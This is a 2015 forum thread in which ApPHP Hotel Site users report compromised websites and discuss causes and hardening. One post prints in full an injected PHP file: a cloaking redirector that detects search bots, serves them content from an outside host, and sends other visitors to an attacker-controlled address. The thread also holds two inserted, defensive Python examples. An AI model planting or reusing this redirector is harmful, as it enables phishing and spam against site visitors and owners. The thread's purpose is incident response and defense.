[SOLVED] Information about security updates?


bleumarine
Junior
Posts: 24
Joined: Apr 21st, '11, 11:44

Re: Information about security updates?

Postby bleumarine » Mar 29th, '15, 20:50

Hello

This is a very big problem. But I think all the hacked websites are on shared hosting accounts, and they are not only Hotel Script!

I checked the list published by gygy42: some of the websites are not using the Hotel Site script at all, and all of them have an injected folder with some files redirecting to malicious pages or fake websites. The frustrating thing is that most of these websites' webmasters or admins are not aware of this, and they wait until the hosting company closes the website.

We wait for the ApPHP security staff to reply to this post. Until then, in my experience I don't think the problem is related to the Hotel Site script but to bad hosting account configuration (.htaccess, chmod, etc.).

bleumarine
Junior
Posts: 24
Joined: Apr 21st, '11, 11:44

Re: Information about security updates?

Postby bleumarine » Mar 30th, '15, 00:44

Hello everyone

As I told you in my previous post, the security problem is not related to Hotel Script but to the shared hosting account. I am not defending the script, but as I am familiar with this script and have used it since 2011, I am sure such a problem is related to hosting accounts and servers.

To prove this I did some research on "online website security check tools" to check the security of the websites given in the list published by gygy42.
I found one website that offers free and paid services, and I chose the free service just to be sure about the source of the problem you encountered (and that I may encounter, as I am a user of this script too).

I share here the tool I used: http://sitecheck.sucuri.net/ (I am not advertising the website, but you can use it just to make sure about what I said in my previous post, or you can find another website with other tools, free or paid).

Then, from the list published by gygy42, I chose the last website (http://www.hotelmargherita.it) to scan and see what exactly the problem with its security is, because this website uses the Hotel Script.

After the scan (you can also scan this website yourself, or your own website, and get useful results) I got the results in the attachment.

From the print screen we can read in red the issues detected.

For this website the problem is: "Outdated Web Server Apache Found", which means vulnerabilities in Apache 2.4 that you can find on the official Apache website: http://httpd.apache.org/security/vulnerabilities_24.html

The status of this issue is "Immediate Action is Recommended", as they said on the Sucuri website.

Now I think it is clear the problem is related to the hosting account and not to the Hotel Script.

Finally, if someone can contact the website owners or webmasters for the list published in the posts (like http://www.hotelmargherita.it) to inform them and share the information with them.

I will wait for the ApPHP security staff to reply first; then, if you need, I can write a small tutorial on how to secure your website, especially when using shared hosting, and I will focus on ApPHP scripts to share my experience with you, of course if you wish and if I get permission from the Administrator.

NB: I tried to attach PNG images but I couldn't, that's why I shared them using a free web service.


gygy42
Junior
Posts: 24
Joined: Dec 5th, '12, 13:42

Re: Information about security updates?

Postby gygy42 » Mar 30th, '15, 10:52

Hi, thanks,
it's funny, it's exactly the same test I have done.
So if it is an Apache server issue it would be great, I was thinking of MySQL...
I'm a little bit aware of CHMOD and .htaccess but a small tuto wouldn't harm!

paavon
Newbie
Posts: 5
Joined: Dec 20th, '11, 17:28

Re: Information about security updates?

Postby paavon » Mar 30th, '15, 11:38

bleumarine wrote:
From the print screen we can read in red the issues detected.

For this website the problem is: "Outdated Web Server Apache Found", which means vulnerabilities in Apache 2.4 that you can find on the official Apache website: http://httpd.apache.org/security/vulnerabilities_24.html

The status of this issue is "Immediate Action is Recommended", as they said on the Sucuri website.

Now I think it is clear the problem is related to the hosting account and not to the Hotel Script.



It's not an accurate way to detect Apache or PHP vulnerabilities just by the version number those servers are replying with. Most distributions (and probably cPanel too, which is very popular, using their own Apache package?) don't always roll the latest version with security updates; they are backporting security updates to the older version. For example, currently my site (where pages are temporarily) runs with version 2.2.15 (httpd-2.2.15-39.el6, says the package manager), and version 2.2.15 for sure has a lot of vulnerabilities, but I have the latest updates from CentOS (Red Hat), so those security holes are fixed. And most sites really don't want to share too much of what Apache says; that's why it's generally a good idea to change the ServerTokens settings a little bit.

https://rhn.redhat.com/errata/RHBA-2014-1386.html, for example, is one I have installed.

The version should be checked, for example, by using package management tools or the vendor's (CentOS, cPanel, whatever) own security announcements, not just by the upstream (Apache, PHP) announcements.

For example, some enterprise-class distros, like Red Hat, offer a 10-year life cycle for their distribution, and they really can't always have the latest version of every piece of software; it would break so many things and cause a lot of other problems, so it's much easier and doesn't break the system to just backport patches to the older version. So if you always want the latest version, those enterprise distros (or long-term supported ones, as they are sometimes called nowadays, like Ubuntu LTS) are not a good choice.

You can read more about "backporting" at https://access.redhat.com/security/updates/backporting

Their solution is to offer newer versions through Red Hat Software Collections.

I don't have any idea which version our hosting company used, but they said that there weren't problems with their security and, like I said, every virtual host is isolated from the others. I'm not sure how it's done, but some container/jail/chroot, whatever, and I didn't have anything else installed there other than Hotel Site (I gave access to those files to Hotel Site support staff while filing the ticket, so they can check if needed). I don't know about those other announcements, but I'm pretty sure that mine is highly connected to Hotel Site. That's why I was curious whether there is any known security hole.

I was thinking, could it be some malicious order (at least I didn't find anything), feedback or something? The site has been running now for a couple of days; I see some connection attempts to the injected files (which are removed), but the site seems to be unharmed so far (no file changes lately). I wrote a script monitoring file changes and so far everything is okay, but I'm still a little bit scared.
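The package-level check described in the post above, as an added example that is not part of the original thread: it reads `rpm -q --changelog` output and sorts the CVEs a banner-based scanner reported into "fixed by a backport" and "not mentioned". The function names, the changelog text and the CVE ids are constructed placeholders.

```python
import re
import subprocess

CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

def read_changelog(package):
    """Return `rpm -q --changelog <package>` output (RPM-based hosts only)."""
    result = subprocess.run(["rpm", "-q", "--changelog", package],
                            capture_output=True, text=True, check=True)
    return result.stdout

def backported_fixes(changelog):
    """Map each CVE id in the changelog to the oldest build that mentions it."""
    fixes, build = {}, None
    for line in changelog.splitlines():
        if line.startswith("* "):
            build = line.split()[-1]       # header ends with version-release
        else:
            for cve in CVE_RE.findall(line):
                fixes[cve] = build         # newest entry first, so the oldest wins
    return fixes

def triage(reported_cves, changelog):
    """Split scanner-reported CVEs into (fixed-by-backport, not-mentioned)."""
    fixes = backported_fixes(changelog)
    fixed = {c: fixes[c] for c in reported_cves if c in fixes}
    # Not mentioned does not prove vulnerable: check the vendor's advisory next.
    unresolved = sorted(c for c in reported_cves if c not in fixes)
    return fixed, unresolved

# Constructed changelog in rpm's layout; names, bug numbers and CVE ids are placeholders.
SAMPLE_CHANGELOG = """\
* Tue Oct 14 2014 Example Packager <pkg@example.invalid> - 2.2.15-39
- mod_example: fix crash on graceful restart (#0000001)

* Mon Jul 07 2014 Example Packager <pkg@example.invalid> - 2.2.15-31
- core: backport upstream fix (CVE-2099-0002)
- mod_example: extend the CVE-2099-0001 fix to the error path

* Thu Mar 20 2014 Example Packager <pkg@example.invalid> - 2.2.15-30
- mod_example: fix denial of service (CVE-2099-0001)
"""

if __name__ == "__main__":
    reported = ["CVE-2099-0001", "CVE-2099-0002", "CVE-2099-0003"]
    fixed, unresolved = triage(reported, SAMPLE_CHANGELOG)
    print("fixed by backport:", fixed)
    print("check vendor advisory:", unresolved)
```

On a live RPM host, pass `read_changelog("httpd")` in place of the sample text.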

adebagus
Junior
Posts: 11
Joined: Mar 21st, '11, 13:56

Re: Information about security updates?

Postby adebagus » Mar 31st, '15, 14:36

sucuri.PNG
Hosted in godaddy.com

Hello All,
My site was compromised too. I only became aware when I checked my email and found in the spam box an email from Google saying it detected phishing activity from the site. I immediately checked using FTP and found that several directories had been randomly created with a bunch of PHP files, as well as in the root directory. One folder even contains 93 PHP files. I deleted all suspicious files and directories. I am not sure if my site is already clean or not.
As suggested in this forum, I checked using Sucuri SiteCheck and found my site is still infected. I do not know what to do now. I host my site at GoDaddy. I wonder why such a big name is not cautious with security. I haven't sent them an email yet, though.
Here is one of the PHP files:


<?php $user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',
                               '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',
                               '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',
                               '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',
                               '#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i',
                               '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',
                               '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',
                               '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
                               '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
                               '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',
                               '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',
                               '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',
                               '#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',
                               '#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i',
                               '#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',
                               '#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',
                               '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',
                               '#charlotte#i', '#ngb#i', '#BingBot#i' ) ;

if ( !empty( $_SERVER['HTTP_USER_AGENT'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){
    $isbot = 1;
   }

if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google'))
{
    $isbot = 1;
}

if ($isbot)
{

$url = "http://20150327test.fefnjefb.in/prsfxeyqrqeiunobznxgckyj";
$options = array(
  'http'=>array(
    'method'=>"GET",
    'header'=>"Accept-language: en\r\n" .
              "Cookie: foo=bar\r\n" .  // check function.stream-context-create on php.net
              "User-Agent: ".$_SERVER['HTTP_USER_AGENT']."\r\n" // i.e. An iPad
  )
);
$context = stream_context_create($options);
$html = file_get_contents($url, false, $context);
echo $html;
}

if(!@$isbot)
{
//

$s = dirname($_SERVER['PHP_SELF']);
if ($s == '\\' | $s == '/') {$s = ('');} 
$s = $_SERVER['SERVER_NAME'] . $s;

header("Location: http://173.236.65.24/input/?mark=20150327test-$s&url=http://20150327test.fefnjefb.in/prsfxeyqrqeiunobznxgckyj");
//header("Location: http://20150327test.fefnjefb.in/prsfxeyqrqeiunobznxgckyj");
exit;
}

?>
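A detection sketch for the traits visible in the file above (visitor identification by User-Agent or reverse DNS, combined with serving remote content or an absolute redirect), as an added example that is not part of the original post. The trait names, function names and both sample sources are constructed for illustration.

```python
import re
from pathlib import Path

# Traits taken from the posted file; each alone is common in legitimate PHP.
TRAITS = {
    "reads_user_agent": re.compile(r"\$_SERVER\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]"),
    "reverse_dns_of_client": re.compile(
        r"gethostbyaddr\s*\(\s*\$_SERVER\[\s*['\"]REMOTE_ADDR['\"]", re.I),
    "remote_fetch": re.compile(
        r"file_get_contents\s*\(\s*\$\w+\s*,\s*false\s*,\s*\$\w+", re.I),
    "offsite_redirect": re.compile(r"header\s*\(\s*['\"]Location:\s*https?://", re.I),
}

def traits_in(source):
    """Return the set of trait names whose pattern occurs in the PHP source."""
    return {name for name, rx in TRAITS.items() if rx.search(source)}

def is_cloaking_redirector(source):
    """Flag only the combination: identify the visitor AND serve off-site content."""
    found = traits_in(source)
    identifies = found & {"reads_user_agent", "reverse_dns_of_client"}
    serves_offsite = found & {"remote_fetch", "offsite_redirect"}
    return bool(identifies and serves_offsite)

def scan_tree(root):
    """Return [(path, sorted traits)] for flagged *.php files under root."""
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        source = path.read_text(errors="replace")
        if is_cloaking_redirector(source):
            hits.append((str(path), sorted(traits_in(source))))
    return hits

# Constructed sample with the same structure as the posted file (placeholder host).
SUSPICIOUS_SAMPLE = """<?php
if (preg_match('#bot#i', $_SERVER['HTTP_USER_AGENT'])) {
    $ctx = stream_context_create(array());
    echo file_get_contents($u, false, $ctx);
} else {
    header("Location: http://redirect.example.invalid/landing");
}
"""

# Constructed benign sample: logs the User-Agent, redirects only within the site.
BENIGN_SAMPLE = """<?php
error_log("login from " . $_SERVER['HTTP_USER_AGENT']);
header("Location: /account/index.php");
"""

if __name__ == "__main__":
    print(sorted(traits_in(SUSPICIOUS_SAMPLE)), is_cloaking_redirector(BENIGN_SAMPLE))
```

Run `scan_tree()` on the web root after cleanup; a hit is a lead for manual review, not proof of infection.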

gygy42
Junior
Posts: 24
Joined: Dec 5th, '12, 13:42

Re: Information about security updates?

Postby gygy42 » Mar 31st, '15, 17:04

Important: check the links!
Just go to Sucuri SiteCheck and click on web details.
You will see if you still have some backlink (in my case it was the template default.php).
On my side I just re-uploaded completely and now I'm looking to secure it using CHMOD and the right .htaccess.
If someone has a good one, just let it be known here!

MelG13
Newbie
Posts: 1
Joined: Apr 10th, '15, 08:10

Re: Information about security updates?

Postby MelG13 » Apr 10th, '15, 08:56

Hi All! Two sites of mine are compromised too: one BusinessDirectory Site (some infected new PHP files in the root plus one new "info" folder incl. one PHP file) and one MicroBlog Site ("only" one new infected license.php file in the root). The sites are hosted via a provider. I've deleted the new files and made the Sucuri check and they are fine, but could anybody figure out the problem? I want to prevent the vulnerability in the future too, of course. Thanks!

sala_tk
Junior
Posts: 18
Joined: Dec 16th, '12, 03:04

Re: Information about security updates?

Postby sala_tk » May 20th, '15, 22:59

Hi Administrator,

I am also facing the same problem: a stranger placed PHP scripts and some other files in many directories and sent a lot of spam e-mail out every day. I searched out those strange files in the infected directories, but afterward it happened in other directories.

I tried to protect against direct script access by putting a .htaccess file with the following commands:

# Block direct requests for PHP files in this directory (Apache 2.2 access-control syntax)
<FilesMatch "\.(php)$">
Order deny,allow
Deny from all
</FilesMatch>

It could help in some directories that do not have any PHP script inside, to stop a stranger's PHP script from running in the directory, but some directories contain system PHP scripts, and there I cannot put a .htaccess file to protect them, otherwise the system PHP scripts cannot run.

Please kindly advise how to prevent these strangers' PHP scripts from running and how to prevent the stranger from placing such unwanted scripts in the Hotel Suite System.

P.S. This problem happened with both V. 4.03 and 4.29; even though I changed the password of the host user, it did not help.

Looking forward for your kind assistance.

cancunplaza
Master
Posts: 146
Joined: Nov 6th, '10, 22:23
Location: Cancun Mx

Re: Information about security updates?

Postby cancunplaza » May 23rd, '15, 12:37

Same problem!

I had to change servers because of this.

I hope the admin gives us an answer, or that they make a security update if that is the case.

Thanks

finalcreations
Newbie
Posts: 4
Joined: Dec 17th, '10, 17:36

Re: Information about security updates?

Postby finalcreations » May 23rd, '15, 15:49

My website was hacked this morning too.
Seems a bit of a coincidence everyone's website has the same files attached.
I have over 200 other websites hosted on multiple servers and it is only the one with ApPHP Hotel script being hacked.

I wish they would fix this security hole because this happened on the last bank holiday too!!
I would imagine in the next few days there will be even more customers having the same problem.

